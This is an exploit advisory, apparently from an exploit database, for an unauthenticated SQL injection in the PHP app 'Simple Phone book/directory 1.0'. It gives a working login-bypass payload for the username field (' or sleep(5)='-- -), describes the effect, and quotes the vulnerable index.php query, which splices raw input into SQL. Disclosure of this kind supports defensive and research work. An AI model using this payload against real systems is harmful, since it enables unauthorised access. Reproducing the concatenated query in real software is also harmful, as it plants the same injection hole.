# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated) # Date: 21/08/2021 # Exploit Author: Justin White # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## SQL Injection # Vulnerable page http://localhost/PhoneBook/index.php # Vulnerable paramater username1 & password # POC Username = ' or sleep(5)='-- - Password = ' ' Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -" # Vulnerable Code index.php line 13 $sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");